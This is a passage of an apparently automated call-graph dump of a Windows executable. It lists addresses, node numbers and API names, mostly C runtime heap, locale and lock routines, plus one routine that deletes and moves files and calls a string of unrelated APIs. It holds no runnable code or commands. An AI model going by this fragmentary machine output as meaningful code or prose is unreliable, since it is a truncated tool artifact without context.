5052->5051 5054 40a26b __mtinitlocknum InitializeCriticalSectionAndSpinCount 5052->5054 5053->5050 5054->5052 5056 407b18 5055->5056 5057 407af9 GetEnvironmentStringsW 5055->5057 5058 407b01 5056->5058 5059 407bb1 5056->5059 5057->5058 5060 407b0d GetLastError 5057->5060 5061 407b43 WideCharToMultiByte 5058->5061 5062 407b34 GetEnvironmentStringsW 5058->5062 5063 407bba GetEnvironmentStrings 5059->5063 5064 404b33 5059->5064 5060->5056 5067 407ba6 FreeEnvironmentStringsW 5061->5067 5068 407b77 5061->5068 5062->5061 5062->5064 5063->5064 5065 407bca 5063->5065 5080 407a20 5064->5080 5069 40915e __malloc_crt 65 API calls 5065->5069 5067->5064 5070 40915e __malloc_crt 65 API calls 5068->5070 5071 407be4 5069->5071 5072 407b7d 5070->5072 5073 407bf7 ___crtGetEnvironmentStringsA 5071->5073 5074 407beb FreeEnvironmentStringsA 5071->5074 5072->5067 5075 407b85 WideCharToMultiByte 5072->5075 5078 407c01 FreeEnvironmentStringsA 5073->5078 5074->5064 5076 407b9f 5075->5076 5077 407b97 5075->5077 5076->5067 5079 404e94 __setmbcp 65 API calls 5077->5079 5078->5064 5079->5076 5081 407a35 5080->5081 5082 407a3a GetModuleFileNameA 5080->5082 5537 409d63 5081->5537 5084 407a61 5082->5084 5531 407886 5084->5531 5086 404b3d 5086->4985 5086->4986 5088 40915e __malloc_crt 65 API calls 5089 407aa3 5088->5089 5089->5086 5090 407886 _parse_cmdline 75 API calls 5089->5090 5090->5086 5092 4077b1 5091->5092 5095 4077b6 _strlen 5091->5095 5093 409d63 ___initmbctable 109 API calls 5092->5093 5093->5095 5094 4091a3 __calloc_crt 65 API calls 5100 4077eb _strlen 5094->5100 5095->5094 5098 404b4e 5095->5098 5096 407849 5097 404e94 __setmbcp 65 API calls 5096->5097 5097->5098 5098->4989 5098->4990 5099 4091a3 __calloc_crt 65 API calls 5099->5100 5100->5096 5100->5098 5100->5099 5101 40786f 5100->5101 5103 404d13 _strcpy_s 65 API calls 5100->5103 5104 407830 5100->5104 5102 404e94 __setmbcp 65 API calls 5101->5102 5102->5098 5103->5100 5104->5100 5105 405424 __invoke_watson 10 API calls 5104->5105 5105->5104 5107 4071c9 __IsNonwritableInCurrentImage 5106->5107 5948 40a21d 5107->5948 5109 4071e7 __initterm_e 5111 407206 __IsNonwritableInCurrentImage __initterm 5109->5111 5952 405a8c 5109->5952 5111->4992 5113 407757 5112->5113 5116 40775c 5112->5116 5114 409d63 ___initmbctable 109 API calls 5113->5114 5114->5116 5115 404b71 5118 40387c 5115->5118 5116->5115 5117 40a5fb __wincmdln 75 API calls 5116->5117 5117->5116 5119 40388f 5118->5119 5123 4038bd 5118->5123 6080 404a17 DeleteFileA 5119->6080 5121 4038d2 SetFilePointer HeapWalk GetMailslotInfo GetProcessPriorityBoost 5121->5123 5122 403895 6086 4049e4 MoveFileA 5122->6086 5123->5121 5125 403915 5123->5125 6052 4034aa 5125->6052 5126 40389c 6092 4040cd 5126->6092 5129 40391a 5129->4999 5149 40736c 5129->5149 5131 4038b0 SetConsoleMode 5132 4038b8 5131->5132 6098 40494f 5132->6098 5135 404a63 5134->5135 5136 404a5e 5134->5136 5138 407404 __NMSG_WRITE 65 API calls 5135->5138 5137 4075af __FF_MSGBANNER 65 API calls 5136->5137 5137->5135 5139 404a6b 5138->5139 5140 407150 _fast_error_exit 2 API calls 5139->5140 5141 404a75 5140->5141 5141->4970 5143 4075af __FF_MSGBANNER 65 API calls 5142->5143 5144 407106 5143->5144 5145 407404 __NMSG_WRITE 65 API calls 5144->5145 5146 40710e 5145->5146 5147 40680e __decode_pointer 5 API calls 5146->5147 5148 404b22 5147->5148 5148->4978 5150 407240 _doexit 65 API calls 5149->5150 5151 40737d 5150->5151 5151->4999 5153 407240 _doexit 65 API calls 5152->5153 5154 4073a3 5153->5154 5154->5002 5209 406805 5155->5209 5157 4073be __init_pointers __initp_misc_winsig 5212 4049d3 5157->5212 5160 406793 __encode_pointer 6 API calls 5161 406c75 5160->5161 5161->5021 5165 408089 5162->5165 5164 406cbd 5164->5010 5166 40680e TlsGetValue 5164->5166 5165->5164 5215 40a26b 5165->5215 5167 406826 5166->5167 5168 406847 GetModuleHandleW 5166->5168 5167->5168 5170 406830 TlsGetValue 5167->5170 5169 406857 5168->5169 5173 40683f 5168->5173 5171 4070cc __crt_waiting_on_module_handle 2 API calls 5169->5171 5172 40683b 5170->5172 5171->5173 5172->5168 5172->5173 5173->5010 5174 4091a3 5173->5174 5176 4091ac 5174->5176 5177 406cea 5176->5177 5178 4091ca Sleep 5176->5178 5220 40a70a 5176->5220 5177->5010 5177->5035 5179 4091df 5178->5179 5179->5176 5179->5177 5509 406e94 5180->5509 5182 406906 GetModuleHandleW 5183 406916 5182->5183 5184 40691c 5182->5184 5185 4070cc __crt_waiting_on_module_handle 2 API calls 5183->5185 5186 406934 GetProcAddress GetProcAddress 5184->5186 5187 406958 5184->5187 5185->5184 5186->5187 5188 4081fa __lock 61 API calls 5187->5188 5189 406977 InterlockedIncrement 5188->5189 5510 4069cf 5189->5510 5192 4081fa __lock 61 API calls 5193 406998 5192->5193 5513 40943b InterlockedIncrement 5193->5513 5195 4069b6 5525 4069d8 5195->5525 5197 4069c3 __setmbcp 5197->5039 5199 4068c7 5198->5199 5200 4068d3 5198->5200 5201 40680e __decode_pointer 5 API calls 5199->5201 5202 4068e7 TlsFree 5200->5202 5203 4068f5 5200->5203 5201->5200 5202->5203 5204 4080fd 5203->5204 5205 4080e5 DeleteCriticalSection 5203->5205 5207 40810f DeleteCriticalSection 5204->5207 5208 40811d 5204->5208 5206 404e94 __setmbcp 65 API calls 5205->5206 5206->5203 5207->5204 5208->5016 5210 406793 __encode_pointer 6 API calls 5209->5210 5211 40680c 5210->5211 5211->5157 5213 406793 __encode_pointer 6 API calls 5212->5213 5214 4049dd 5213->5214 5214->5160 5219 406e94 5215->5219 5217 40a277 InitializeCriticalSectionAndSpinCount 5218 40a2bb __setmbcp 5217->5218 5218->5165 5219->5217 5221 40a716 __setmbcp 5220->5221 5222 40a72e 5221->5222 5232 40a74d _memset 5221->5232 5233 4055b4 5222->5233 5226 40a7bf RtlAllocateHeap 5226->5232 5229 40a743 __setmbcp 5229->5176 5232->5226 5232->5229 5239 4081fa 5232->5239 5246 408a0c 5232->5246 5252 40a806 5232->5252 5255 405ab2 5232->5255 5258 4069e1 GetLastError 5233->5258 5235 4055b9 5236 40554c 5235->5236 5237 40680e __decode_pointer 5 API calls 5236->5237 5238 40555c __invoke_watson 5237->5238 5240 408222 EnterCriticalSection 5239->5240 5241 40820f 5239->5241 5240->5232 5305 408137 5241->5305 5243 408215 5243->5240 5244 4070fc __amsg_exit 64 API calls 5243->5244 5245 408221 5244->5245 5245->5240 5247 408a3a 5246->5247 5249 408adc 5247->5249 5251 408ad3 5247->5251 5497 408573 5247->5497 5249->5232 5251->5249 5504 408623 5251->5504 5508 408120 LeaveCriticalSection 5252->5508 5254 40a80d 5254->5232 5256 40680e __decode_pointer 5 API calls 5255->5256 5257 405ac2 5256->5257 5257->5232 5272 406889 TlsGetValue 5258->5272 5261 406a4e SetLastError 5261->5235 5262 4091a3 __calloc_crt 62 API calls 5263 406a0c 5262->5263 5263->5261 5264 40680e __decode_pointer 5 API calls 5263->5264 5265 406a26 5264->5265 5266 406a45 5265->5266 5267 406a2d 5265->5267 5277 404e94 5266->5277 5268 4068fa __mtinit 62 API calls 5267->5268 5271 406a35 GetCurrentThreadId 5268->5271 5270 406a4b 5270->5261 5271->5261 5273 4068b9 5272->5273 5274 40689e 5272->5274 5273->5261 5273->5262 5275 40680e __decode_pointer 5 API calls 5274->5275 5276 4068a9 TlsSetValue 5275->5276 5276->5273 5279 404ea0 __setmbcp 5277->5279 5278 404f19 _realloc __setmbcp 5278->5270 5279->5278 5280 404edf 5279->5280 5282 4081fa __lock 63 API calls 5279->5282 5280->5278 5281 404ef4 HeapFree 5280->5281 5281->5278 5283 404f06 5281->5283 5286 404eb7 ___sbh_find_block 5282->5286 5284 4055b4 __setmbcp 63 API calls 5283->5284 5285 404f0b GetLastError 5284->5285 5285->5278 5289 404ed1 5286->5289 5290 40825d 5286->5290 5297 404eea 5289->5297 5291 40829c 5290->5291 5296 40853e 5290->5296 5292 408488 VirtualFree 5291->5292 5291->5296 5293 4084ec 5292->5293 5294 4084fb VirtualFree HeapFree 5293->5294 5293->5296 5300 405600 5294->5300 5296->5289 5304 408120 LeaveCriticalSection 5297->5304 5299 404ef1 5299->5280 5301 405618 5300->5301 5302 40563f __VEC_memcpy 5301->5302 5303 405647 5301->5303 5302->5303 5303->5296 5304->5299 5306 408143 __setmbcp 5305->5306 5320 408169 5306->5320 5331 4075af 5306->5331 5312 408179 __setmbcp 5312->5243 5314 40819a 5316 4081fa __lock 65 API calls 5314->5316 5315 40818b 5318 4055b4 __setmbcp 65 API calls 5315->5318 5319 4081a1 5316->5319 5318->5312 5321 4081d5 5319->5321 5322 4081a9 5319->5322 5320->5312 5377 40915e 5320->5377 5324 404e94 __setmbcp 65 API calls 5321->5324 5323 40a26b __mtinitlocknum InitializeCriticalSectionAndSpinCount 5322->5323 5325 4081b4 5323->5325 5326 4081c6 5324->5326 5325->5326 5327 404e94 __setmbcp 65 API calls 5325->5327 5383 4081f1 5326->5383 5329 4081c0 5327->5329 5330 4055b4 __setmbcp 65 API calls 5329->5330 5330->5326 5386 40a55d 5331->5386 5334 4075c3 5336 407404 __NMSG_WRITE 65 API calls 5334->5336 5339 4075e5 5334->5339 5335 40a55d __set_error_mode 65 API calls 5335->5334 5337 4075db 5336->5337 5338 407404 __NMSG_WRITE 65 API calls 5337->5338 5338->5339 5340 407404 5339->5340 5341 407418 5340->5341 5342 40a55d __set_error_mode 62 API calls 5341->5342 5373 407573 5341->5373 5343 40743a 5342->5343 5344 407578 GetStdHandle 5343->5344 5346 40a55d __set_error_mode 62 API calls 5343->5346 5345 407586 _strlen 5344->5345 5344->5373 5349 40759f WriteFile 5345->5349 5345->5373 5347 40744b 5346->5347 5347->5344 5348 40745d 5347->5348 5348->5373 5392 404d13 5348->5392 5349->5373 5352 407493 GetModuleFileNameA 5353 4074b1 5352->5353 5360 4074d4 _strlen 5352->5360 5355 404d13 _strcpy_s 62 API calls 5353->5355 5357 4074c1 5355->5357 5359 405424 __invoke_watson 10 API calls 5357->5359 5357->5360 5358 407517 5417 40a434 5358->5417 5359->5360 5360->5358 5408 40a4a8 5360->5408 5364 40753b 5367 40a434 _strcat_s 62 API calls 5364->5367 5366 405424 __invoke_watson 10 API calls 5366->5364 5368 40754f 5367->5368 5370 407560 5368->5370 5371 405424 __invoke_watson 10 API calls 5368->5371 5369 405424 __invoke_watson 10 API calls 5369->5358 5426 40a2cb 5370->5426 5371->5370 5374 407150 5373->5374 5464 407125 GetModuleHandleW 5374->5464 5379 409167 5377->5379 5380 408184 5379->5380 5381 40917e Sleep 5379->5381 5466 404dca 5379->5466 5380->5314 5380->5315 5382 409193 5381->5382 5382->5379 5382->5380 5496 408120 LeaveCriticalSection 5383->5496 5385 4081f8 5385->5312 5387 40a56c 5386->5387 5388 4055b4 __setmbcp 65 API calls 5387->5388 5390 4075b6 5387->5390 5389 40a58f 5388->5389 5391 40554c __msize 5 API calls 5389->5391 5390->5334 5390->5335 5391->5390 5393 404d24 5392->5393 5396 404d2b 5392->5396 5393->5396 5399 404d51 5393->5399 5394 4055b4 __setmbcp 65 API calls 5395 404d30 5394->5395 5397 40554c __msize 5 API calls 5395->5397 5396->5394 5398 404d3f 5397->5398 5398->5352 5401 405424 5398->5401 5399->5398 5400 4055b4 __setmbcp 65 API calls 5399->5400 5400->5395 5453 405030 5401->5453 5403 405451 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5404 405521 __invoke_watson 5403->5404 5405 40552d GetCurrentProcess TerminateProcess 5403->5405 5404->5405 5455 404c9b 5405->5455 5407 40554a 5407->5352 5413 40a4ba 5408->5413 5409 40a4be 5410 407504 5409->5410 5411 4055b4 __setmbcp 65 API calls 5409->5411 5410->5358 5410->5369 5412 40a4da 5411->5412 5414 40554c __msize 5 API calls 5412->5414 5413->5409 5413->5410 5415 40a504 5413->5415 5414->5410 5415->5410 5416 4055b4 __setmbcp 65 API calls 5415->5416 5416->5412 5418 40a44c 5417->5418 5421 40a445 5417->5421 5419 4055b4 __setmbcp 65 API calls 5418->5419 5420 40a451 5419->5420 5422 40554c __msize 5 API calls 5420->5422 5421->5418 5424 40a480 5421->5424 5423 40752a 5422->5423 5423->5364 5423->5366 5424->5423 5425 4055b4 __setmbcp 65 API calls 5424->5425 5425->5420 5427 406805 FindHandlerForForeignException 6 API calls 5426->5427 5428 40a2db 5427->5428 5429 40a2ee LoadLibraryA 5428->5429 5431 40a376 5428->5431 5430 40a303 GetProcAddress 5429->5430 5442 40a418 5429->5442 5432 40a319 5430->5432 5430->5442 5435 40680e __decode_pointer 5 API calls 5431->5435 5449 40a3a0 5431->5449 5436 406793 __encode_pointer 6 API calls 5432->5436 5433 40680e __decode_pointer 5 API calls 5433->5442 5434 40680e __decode_pointer 5 API calls 5443 40a3e3 5434->5443 5437 40a393 5435->5437 5438 40a31f GetProcAddress 5436->5438 5439 40680e __decode_pointer 5 API calls 5437->5439 5440 406793 __encode_pointer 6 API calls 5438->5440 5439->5449 5441 40a334 GetProcAddress 5440->5441 5444 406793 __encode_pointer 6 API calls 5441->5444 5442->5373 5448 40680e __decode_pointer 5 API calls 5443->5448 5451 40a3cb 5443->5451 5445 40a349 GetProcAddress 5444->5445 5446 406793 __encode_pointer 6 API calls 5445->5446 5447 40a35e 5446->5447 5447->5431 5450 40a368 GetProcAddress 5447->5450 5448->5451 5449->5434 5449->5451 5452 406793 __encode_pointer 6 API calls 5450->5452 5451->5433 5452->5431 5454 40503c __VEC_memzero 5453->5454 5454->5403 5456 404ca3 5455->5456 5457 404ca5 IsDebuggerPresent 5455->5457 5456->5407 5463 409156 5457->5463 5460 408045 SetUnhandledExceptionFilter UnhandledExceptionFilter 5461 40806a GetCurrentProcess TerminateProcess 5460->5461 5462 408062 __invoke_watson 5460->5462 5461->5407 5462->5461 5463->5460 5465 407139 ExitProcess 5464->5465 5467 404e7d 5466->5467 5476 404ddc 5466->5476 5468 405ab2 _malloc 5 API calls 5467->5468 5469 404e83 5468->5469 5471 4055b4 __setmbcp 64 API calls 5469->5471 5470 4075af __FF_MSGBANNER 64 API calls 5475 404ded 5470->5475 5483 404e75 5471->5483 5472 407404 __NMSG_WRITE 64 API calls 5472->5475 5474 404e39 RtlAllocateHeap 5474->5476 5475->5470 5475->5472 5475->5476 5477 407150 _fast_error_exit 2 API calls 5475->5477 5476->5474 5476->5475 5478 404e69 5476->5478 5479 405ab2 _malloc 5 API calls 5476->5479 5481 404e6e 5476->5481 5476->5483 5484 404d7b 5476->5484 5477->5475 5480 4055b4 __setmbcp 64 API calls 5478->5480 5479->5476 5480->5481 5482 4055b4 __setmbcp 64 API calls 5481->5482 5482->5483 5483->5379 5485 404d87 __setmbcp 5484->5485 5486 404db8 __setmbcp 5485->5486 5487 4081fa __lock 65 API calls 5485->5487 5486->5476 5488 404d9d 5487->5488 5489 408a0c ___sbh_alloc_block 5 API calls 5488->5489 5490 404da8 5489->5490 5492 404dc1 5490->5492 5495 408120 LeaveCriticalSection 5492->5495 5494 404dc8 5494->5486 5495->5494 5496->5385 5498 408586 HeapReAlloc 5497->5498 5499 4085ba HeapAlloc 5497->5499 5500 4085a4 5498->5500 5501 4085a8 5498->5501 5499->5500 5502 4085dd VirtualAlloc 5499->5502 5500->5251 5501->5499 5502->5500 5503 4085f7 HeapFree 5502->5503 5503->5500 5505 40863a VirtualAlloc 5504->5505 5507 408681 5505->5507 5507->5249 5508->5254 5509->5182 5528 408120 LeaveCriticalSection 5510->5528 5512 406991 5512->5192 5514 409459 InterlockedIncrement 5513->5514 5515 40945c 5513->5515 5514->5515 5516 409466 InterlockedIncrement 5515->5516 5517 409469 5515->5517 5516->5517 5518 409473 InterlockedIncrement 5517->5518 5519 409476 5517->5519 5518->5519 5520 409480 InterlockedIncrement 5519->5520 5522 409483 5519->5522 5520->5522 5521 40949c InterlockedIncrement 5521->5522 5522->5521 5523 4094ac InterlockedIncrement 5522->5523 5524 4094b7 InterlockedIncrement 5522->5524 5523->5522 5524->5195 5529 408120 LeaveCriticalSection 5525->5529 5527 4069df 5527->5197 5528->5512 5529->5527 5530->5042 5533 4078a5 5531->5533 5535 407912 5533->5535 5541 40a5fb 5533->5541 5534 407a10 5534->5086 5534->5088 5535->5534 5536 40a5fb 75 API calls __wincmdln 5535->5536 5536->5535 5538 409d6c 5537->5538 5539 409d73 5537->5539 5763 409bc9 5538->5763 5539->5082 5544 40a5a8 5541->5544 5547 4098e1 5544->5547 5548 4098f4 5547->5548 5554 409941 5547->5554 5555 406a5a 5548->5555 5551 409921 5551->5554 5575 40983d 5551->5575 5554->5533 5556 4069e1 __getptd_noexit 65 API calls 5555->5556 5558 406a62 5556->5558 5557 406a6f 5557->5551 5560 4095a1 5557->5560 5558->5557 5559 4070fc __amsg_exit 65 API calls 5558->5559 5559->5557 5561 4095ad __setmbcp 5560->5561 5562 406a5a __getptd 65 API calls 5561->5562 5563 4095b2 5562->5563 5564 4095e0 5563->5564 5565 4095c4 5563->5565 5566 4081fa __lock 65 API calls 5564->5566 5568 406a5a __getptd 65 API calls 5565->5568 5567 4095e7 5566->5567 5591 409563 5567->5591 5572 4095c9 5568->5572 5573 4095d7 __setmbcp 5572->5573 5574 4070fc __amsg_exit 65 API calls 5572->5574 5573->5551 5574->5573 5576 409849 __setmbcp 5575->5576 5577 406a5a __getptd 65 API calls 5576->5577 5578 40984e 5577->5578 5579 4081fa __lock 65 API calls 5578->5579 5587 409860 5578->5587 5580 40987e 5579->5580 5581 4098c7 5580->5581 5585 409895 InterlockedDecrement 5580->5585 5586 4098af InterlockedIncrement 5580->5586 5759 4098d8 5581->5759 5582 4070fc __amsg_exit 65 API calls 5584 40986e __setmbcp 5582->5584 5584->5554 5585->5586 5588 4098a0 5585->5588 5586->5581 5587->5582 5587->5584 5588->5586 5589 404e94 __setmbcp 65 API calls 5588->5589 5590 4098ae 5589->5590 5590->5586 5592 409567 5591->5592 5593 409599 5591->5593 5592->5593 5594 40943b ___addlocaleref 8 API calls 5592->5594 5599 40960b 5593->5599 5595 40957a 5594->5595 5595->5593 5602 4094ca 5595->5602 5758 408120 LeaveCriticalSection 5599->5758 5601 409612 5601->5572 5603 4094db InterlockedDecrement 5602->5603 5604 40955e 5602->5604 5605 4094f0 InterlockedDecrement 5603->5605 5606 4094f3 5603->5606 5604->5593 5616 4092f2 5604->5616 5605->5606 5607 409500 5606->5607 5608 4094fd InterlockedDecrement 5606->5608 5609 40950a InterlockedDecrement 5607->5609 5610 40950d 5607->5610 5608->5607 5609->5610 5611 409517 InterlockedDecrement 5610->5611 5613 40951a 5610->5613 5611->5613 5612 409533 InterlockedDecrement 5612->5613 5613->5612 5614 409543 InterlockedDecrement 5613->5614 5615 40954e InterlockedDecrement 5613->5615 5614->5613 5615->5604 5617 409376 5616->5617 5620 409309 5616->5620 5618 404e94 __setmbcp 65 API calls 5617->5618 5619 4093c3 5617->5619 5621 409397 5618->5621 5632 4093ea 5619->5632 5670 40aa43 5619->5670 5620->5617 5627 404e94 __setmbcp 65 API calls 5620->5627 5629 40933d 5620->5629 5623 404e94 __setmbcp 65 API calls 5621->5623 5628 4093aa 5623->5628 5625 40942f 5631 404e94 __setmbcp 65 API calls 5625->5631 5626 404e94 __setmbcp 65 API calls 5626->5632 5633 409332 5627->5633 5634 404e94 __setmbcp 65 API calls 5628->5634 5635 404e94 __setmbcp 65 API calls 5629->5635 5645 40935e 5629->5645 5630 404e94 __setmbcp 65 API calls 5636 40936b 5630->5636 5637 409435 5631->5637 5632->5625 5641 404e94 65 API calls __setmbcp 5632->5641 5646 40ac1d 5633->5646 5639 4093b8 5634->5639 5640 409353 5635->5640 5642 404e94 __setmbcp 65 API calls 5636->5642 5637->5593 5643 404e94 __setmbcp 65 API calls 5639->5643 5662 40abd8 5640->5662 5641->5632 5642->5617 5643->5619 5645->5630 5647 40ac2a 5646->5647 5661 40aca7 5646->5661 5648 404e94 __setmbcp 65 API calls 5647->5648 5649 40ac3b 5647->5649 5648->5649 5650 40ac4d 5649->5650 5651 404e94 __setmbcp 65 API calls 5649->5651 5652 40ac5f 5650->5652 5653 404e94 __setmbcp 65 API calls 5650->5653 5651->5650 5654 40ac71 5652->5654 5655 404e94 __setmbcp 65 API calls 5652->5655 5653->5652 5656 40ac83 5654->5656 5657 404e94 __setmbcp 65 API calls 5654->5657 5655->5654 5658 40ac95 5656->5658 5659 404e94 __setmbcp 65 API calls 5656->5659 5657->5656 5660 404e94 __setmbcp 65 API calls 5658->5660 5658->5661 5659->5658 5660->5661 5661->5629 5663 40abe5 5662->5663 5669 40ac19 5662->5669 5664 404e94 __setmbcp 65 API calls 5663->5664 5665 40abf5 5663->5665 5664->5665 5666 40ac07 5665->5666 5667 404e94 __setmbcp 65 API calls 5665->5667 5668 404e94 __setmbcp 65 API calls 5666->5668 5666->5669 5667->5666 5668->5669 5669->5645 5671 40aa54 5670->5671 5757 4093e3 5670->5757 5672 404e94 __setmbcp 65 API calls 5671->5672 5673 40aa5c 5672->5673 5674 404e94 __setmbcp 65 API calls 5673->5674 5675 40aa64 5674->5675 5676 404e94 __setmbcp 65 API calls 5675->5676 5677 40aa6c 5676->5677 5678 404e94 __setmbcp 65 API calls 5677->5678 5679 40aa74 5678->5679 5680 404e94 __setmbcp 65 API calls 5679->5680 5681 40aa7c 5680->5681 5682 404e94 __setmbcp 65 API calls 5681->5682 5683 40aa84 5682->5683 5684 404e94 __setmbcp 65 API calls 5683->5684 5685 40aa8b 5684->5685 5686 404e94 __setmbcp 65 API calls 5685->5686 5687 40aa93 5686->5687 5688 404e94 __setmbcp 65 API calls 5687->5688 5689 40aa9b 5688->5689 5690 404e94 __setmbcp 65 API calls 5689->5690 5691 40aaa3 5690->5691 5692 404e94 __setmbcp 65 API calls 5691->5692 5693 40aaab 5692->5693 5694 404e94 __setmbcp 65 API calls 5693->5694 5695 40aab3 5694->5695 5696 404e94 __setmbcp 65 API calls 5695->5696 5697 40aabb 5696->5697 5698 404e94 __setmbcp 65 API calls 5697->5698 5699 40aac3 5698->5699 5700 404e94 __setmbcp 65 API calls 5699->5700 5701 40aacb 5700->5701 5702 404e94 __setmbcp 65 API calls 5701->5702 5703 40aad3 5702->5703 5704 404e94 __setmbcp 65 API calls 5703->5704 5705 40aade 5704->5705 5706 404e94 __setmbcp 65 API calls 5705->5706 5707 40aae6 5706->5707 5708 404e94 __setmbcp 65 API calls 5707->5708 5709 40aaee 5708->5709 5710 404e94 __setmbcp 65 API calls 5709->5710 5711 40aaf6 5710->5711 5712 404e94 __setmbcp 65 API calls 5711->5712 5713 40aafe 5712->5713 5714 404e94 __setmbcp 65 API calls 5713->5714 5715 40ab06 5714->5715 5716 404e94 __setmbcp 65 API calls 5715->5716 5717 40ab0e 5716->5717 5718 404e94 __setmbcp 65 API calls 5717->5718 5719 40ab16 5718->5719 5720 404e94 __setmbcp 65 API calls 5719->5720 5721 40ab1e 5720->5721 5722 404e94 __setmbcp 65 API calls 5721->5722 5723 40ab26 5722->5723 5724 404e94 __setmbcp 65 API calls 5723->5724 5725 40ab2e 5724->5725 5726 404e94 __setmbcp 65 API calls 5725->5726 5727 40ab36 5726->5727 5728 404e94 __setmbcp 65 API calls 5727->5728 5729 40ab3e 5728->5729 5730 404e94 __setmbcp 65 API calls 5729->5730 5731 40ab46 5730->5731 5732 404e94 __setmbcp 65 API calls 5731->5732 5733 40ab4e 5732->5733 5734 404e94 __setmbcp 65 API calls 5733->5734 5735 40ab56 5734->5735 5736 404e94 __setmbcp 65 API calls 5735->5736 5737 40ab64 5736->5737 5738 404e94 __setmbcp 65 API calls 5737->5738 5739 40ab6f 5738->5739 5740 404e94 __setmbcp 65 API calls 5739->5740 5741 40ab7a 5740->5741 5742 404e94 __setmbcp 65 API calls 5741->5742 5743 40ab85 5742->5743 5744 404e94 __setmbcp 65 API calls 5743->5744 5745 40ab90 5744->5745 5746 404e94 __setmbcp 65 API calls 5745->5746 5747 40ab9b 5746->5747 5748 404e94 __setmbcp 65 API calls 5747->5748 5749 40aba6 5748->5749 5750 404e94 __setmbcp 65 API calls 5749->5750 5751 40abb1 5750->5751 5752 404e94 __setmbcp 65 API calls 5751->5752 5753 40abbc 5752->5753 5754 404e94 __setmbcp 65 API calls 5753->5754 5755 40abc7 5754->5755 5756 404e94 __setmbcp 65 API calls 5755->5756 5756->5757 5757->5626 5758->5601 5762 408120 LeaveCriticalSection 5759->5762 5761 4098df 5761->5587 5762->5761 5764 409bd5 __setmbcp 5763->5764 5765 406a5a __getptd 65 API calls 5764->5765 5766 409bde 5765->5766 5767 40983d _LocaleUpdate::_LocaleUpdate 67 API calls 5766->5767 5768 409be8 5767->5768 5794 409968 5768->5794 5771 40915e __malloc_crt 65 API calls 5772 409c09 5771->5772 5773 409d28 __setmbcp 5772->5773 5801 4099e4 5772->5801 5773->5539 5776 409d35 5776->5773 5780 409d48 5776->5780 5782 404e94 __setmbcp 65 API calls 5776->5782 5777 409c39 InterlockedDecrement 5778 409c49 5777->5778 5779 409c5a InterlockedIncrement 5777->5779 5778->5779 5784 404e94 __setmbcp 65 API calls 5778->5784 5779->5773 5781 409c70 5779->5781 5783 4055b4 __setmbcp 65 API calls 5780->5783 5781->5773 5785 4081fa __lock 65 API calls 5781->5785 5782->5780 5783->5773 5786 409c59 5784->5786 5787 409c84 InterlockedDecrement 5785->5787 5786->5779 5789 409d00 5787->5789 5790 409d13 InterlockedIncrement 5787->5790 5789->5790 5792 404e94 __setmbcp 65 API calls 5789->5792 5811 409d2a 5790->5811 5793 409d12 5792->5793 5793->5790 5795 4098e1 _LocaleUpdate::_LocaleUpdate 75 API calls 5794->5795 5796 40997c 5795->5796 5797 4099a5 5796->5797 5798 409987 GetOEMCP 5796->5798 5799 4099aa GetACP 5797->5799 5800 409997 5797->5800 5798->5800 5799->5800 5800->5771 5800->5773 5802 409968 getSystemCP 77 API calls 5801->5802 5803 409a04 5802->5803 5804 409a0f setSBCS 5803->5804 5807 409a78 _memset __setmbcp_nolock 5803->5807 5808 409a53 IsValidCodePage 5803->5808 5805 404c9b TranslatorGuardHandler 5 API calls 5804->5805 5806 409bc7 5805->5806 5806->5776 5806->5777 5814 4096aa GetCPInfo 5807->5814 5808->5804 5809 409a65 GetCPInfo 5808->5809 5809->5804 5809->5807 5947 408120 LeaveCriticalSection 5811->5947 5813 409d31 5813->5773 5815 409790 5814->5815 5818 4096de _memset 5814->5818 5820 404c9b TranslatorGuardHandler 5 API calls 5815->5820 5824 40aed0 5818->5824 5822 40983b 5820->5822 5822->5807 5823 40b305 ___crtLCMapStringA 100 API calls 5823->5815 5825 4098e1 _LocaleUpdate::_LocaleUpdate 75 API calls 5824->5825 5826 40aee3 5825->5826 5834 40ad16 5826->5834 5829 40b305 5830 4098e1 _LocaleUpdate::_LocaleUpdate 75 API calls 5829->5830 5831 40b318 5830->5831 5900 40af60 5831->5900 5835 40ad62 5834->5835 5836 40ad37 GetStringTypeW 5834->5836 5838 40ad4f 5835->5838 5839 40ae49 5835->5839 5837 40ad57 GetLastError 5836->5837 5836->5838 5837->5835 5840 40ad9b MultiByteToWideChar 5838->5840 5857 40ae43 5838->5857 5862 40b61c GetLocaleInfoA 5839->5862 5847 40adc8 5840->5847 5840->5857 5842 404c9b TranslatorGuardHandler 5 API calls 5844 40974b 5842->5844 5844->5829 5845 40ae9a GetStringTypeExA 5850 40aeb5 5845->5850 5845->5857 5846 40addd _memset __crtLCMapStringA_stat 5849 40ae16 MultiByteToWideChar 5846->5849 5846->5857 5847->5846 5851 404dca _malloc 65 API calls 5847->5851 5853 40ae2c GetStringTypeW 5849->5853 5854 40ae3d 5849->5854 5855 404e94 __setmbcp 65 API calls 5850->5855 5851->5846 5853->5854 5858 40acab 5854->5858 5855->5857 5857->5842 5859 40acb7 5858->5859 5860 40acc8 5858->5860 5859->5860 5861 404e94 __setmbcp 65 API calls 5859->5861 5860->5857 5861->5860 5863 40b64a 5862->5863 5864 40b64f 5862->5864 5866 404c9b TranslatorGuardHandler 5 API calls 5863->5866 5893 40a6f4 5864->5893 5867 40ae6d 5866->5867 5867->5845 5867->5857 5868 40b665 5867->5868 5869 40b6a5 GetCPInfo 5868->5869 5873 40b72f 5868->5873 5870 40b71a MultiByteToWideChar 5869->5870 5871 40b6bc 5869->5871 5870->5873 5877 40b6d5 _strlen 5870->5877 5871->5870 5874 40b6c2 GetCPInfo 5871->5874 5872 404c9b TranslatorGuardHandler 5 API calls 5875 40ae8e 5872->5875 5873->5872 5874->5870 5876 40b6cf 5874->5876 5875->5845 5875->5857 5876->5870 5876->5877 5878 404dca _malloc 65 API calls 5877->5878 5880 40b707 _memset __crtLCMapStringA_stat 5877->5880 5878->5880 5879 40b764 MultiByteToWideChar 5881 40b79b 5879->5881 5882 40b77c 5879->5882 5880->5873 5880->5879 5883 40acab __freea 65 API calls 5881->5883 5884 40b7a0 5882->5884 5885 40b783 WideCharToMultiByte 5882->5885 5883->5873 5886 40b7ab WideCharToMultiByte 5884->5886 5887 40b7bf 5884->5887 5885->5881 5886->5881 5886->5887 5888 4091a3 __calloc_crt 65 API calls 5887->5888 5889 40b7c7 5888->5889 5889->5881 5890 40b7d0 WideCharToMultiByte 5889->5890 5890->5881 5891 40b7e2 5890->5891 5892 404e94 __setmbcp 65 API calls 5891->5892 5892->5881 5896 40b582 5893->5896 5897 40b59b 5896->5897 5898 